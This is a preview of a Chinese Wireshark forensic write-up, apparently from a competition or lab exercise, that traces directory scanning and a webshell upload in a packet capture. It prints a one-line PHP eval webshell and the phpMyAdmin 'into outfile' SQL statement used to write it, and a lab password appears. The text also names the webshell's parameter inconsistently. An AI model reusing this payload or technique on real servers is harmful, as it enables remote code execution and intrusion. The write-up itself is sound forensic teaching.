Wireshark分析:Bravo-1数据包中的恶意活动与目录扫描
"03-详细解析过程-bravo-1.docx" 在网络安全和数据包分析领域,Wireshark是一款强大的工具,用于捕获和分析网络流量。在这个特定的任务中,我们关注的是一个名为"Bravo-1"的数据包文件,即"Bravo-1.pcapng"。该文件包含了一次渗透测试或模拟攻击的情景,其中渗透机是运行Windows7的系统,用户名为"administrator",密码为"123456"。 首先,我们需要找到恶意用户进行目录扫描时的第二个目录名。通过对数据包进行过滤并专注于HTTP流量,我们可以观察到"info"列中的目录列表,尤其是那些返回404 Not Found响应的请求。这通常意味着攻击者正在尝试访问不存在的路径。在本例中,找到的第二个目录名是"uploads",这可能是攻击者试图探测的潜在弱点。 接着,我们要确定恶意用户是如何写入一句话木马的。通过追踪TCP流,我们可以区分发送和接收的包。在绿色的接收包中,我们注意到与"phpmyadmin"相关的活动。通过分析数据包内容,特别是寻找POST请求,我们发现了一个SQL注入攻击的痕迹。攻击者使用了如下的SQL语句: ```sql select '<?php@eval($_POST[cia]);?>' into outfile 'c:/phpstudy/www/m/shell2.php' ``` 这表明恶意代码被写入了路径"c:/phpstudy/www/m/shell2.php"。此操作是通过访问"phpmyadmin"目录下的"server_sql.php"文件来完成的。执行的SQL语句会创建一个PHP文件,当接收到POST请求时,它会执行通过 cabbage 参数传递的任何PHP代码。 此外,还可以通过过滤器"http.request.method==POST"来查找可疑活动,这帮助我们找到了名为"shell2.php"的文件,其数据区包含了木马代码。另一个包显示了通过"/phpmyadmin/import.php"文件执行的SQL语句注入,也写入了木马文件。 "Bravo-1.pcapng"文件分析揭示了两个关键点:一是恶意用户使用目录扫描技术尝试访问"uploads"目录;二是攻击者利用SQL注入在"c:/phpstudy/www/m/"目录下写入了一句话木马"shell2.php",主要通过"phpmyadmin"目录的"server_sql.php"和"import.php"文件实现。这些信息对于理解网络攻击的模式以及防御策略至关重要。
下载后可阅读完整内容,剩余4页未读,立即下载
- 粉丝: 0
- 资源: 5
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
最新资源
- 构建Cadence PSpice仿真模型库教程
- VMware 10.0安装指南:步骤详解与网络、文件共享解决方案
- 中国互联网20周年必读:影响行业的100本经典书籍
- SQL Server 2000 Analysis Services的经典MDX查询示例
- VC6.0 MFC操作Excel教程:亲测Win7下的应用与保存技巧
- 使用Python NetworkX处理网络图
- 科技驱动:计算机控制技术的革新与应用
- MF-1型机器人硬件与robobasic编程详解
- ADC性能指标解析:超越位数、SNR和谐波
- 通用示波器改造为逻辑分析仪:0-1字符显示与电路设计
- C++实现TCP控制台客户端
- SOA架构下ESB在卷烟厂的信息整合与决策支持
- 三维人脸识别:技术进展与应用解析
- 单张人脸图像的眼镜边框自动去除方法
- C语言绘制图形:余弦曲线与正弦函数示例
- Matlab 文件操作入门:fopen、fclose、fprintf、fscanf 等函数使用详解